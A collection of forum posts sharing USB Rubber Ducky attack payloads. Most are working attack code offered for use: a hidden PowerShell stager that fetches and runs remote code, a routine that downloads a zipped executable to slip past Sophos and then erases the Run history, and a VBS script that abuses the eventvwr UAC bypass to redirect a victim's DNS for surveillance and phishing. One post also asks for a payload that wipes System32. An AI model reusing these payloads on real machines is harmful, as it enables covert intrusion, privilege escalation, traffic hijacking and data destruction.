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  1. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  2. Hello! I recently ordered a USB Rubber Ducky, and still a noob at it. I was wondering if one of you guys would be kind enough to make it do something, if it's possible. I want it, after it's plugged, to immediately start backing up the windows 10 and then after that it sends saves it online, or I heard about "TwinDuck" which can make it save it on there, which is better... So after it saves a backup on the Ducky, I want it to completely destroy the PC, maybe by erasing "System32" I am not sure I just want it to mess it up and delete everything. All while the backup is still on the rubber ducky. I would really appreciate if one could help me with such a mission, thanks! PS: If it could be compatible with all windows versions, it would be better.
  3. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie
  4. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered when the ducky is connected to any targeted windows machine. It will execute an powerful one-liner inside the "run" dialog of the system. The one liner is a simple powershell script, that when executes instantly hides then powershell windows and runs it the background. The powershell script downloads and execute our stage 2 .vbs payload in the %temp% directory Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the windows registry system, this allows us to execute any binary file on the system with admin privilege without prompting the user for access (UAC). My Twitter: https://twitter.com/SkiddieTech
  5. Hi there, I'm new here and I wanted to share a basic script that i wrote. It just opens up your webbrowser and navigates to the site http://fakeupdate.net/. On this site you can find many fake installtion videos, in this case i'm using the Windows 98 one. This script is just a basic one, for other beginners like me... Here's the code: REM FakeUpdate v.1.0 REM This basic Script just opens the website fakeupdate.net, where you can find videos of os installtions... REM Author: fachsimpeln WINDOWS d DELAY 500 WINDOWS r DELAY 500 STRING http://www.fakeupdate.net/windows98/index.html ENTER DELAY 1000 F11 I hope you like it, fachsimpeln
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